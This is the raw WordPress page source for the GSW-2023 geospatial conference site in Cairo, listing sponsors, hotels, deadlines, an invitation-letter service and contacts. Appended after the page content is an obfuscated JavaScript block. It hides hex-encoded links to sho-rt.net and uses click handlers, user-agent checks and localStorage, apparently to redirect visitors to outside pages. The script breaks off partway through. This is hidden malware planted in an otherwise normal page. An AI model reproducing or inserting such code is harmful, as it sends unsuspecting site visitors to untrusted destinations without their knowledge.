alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 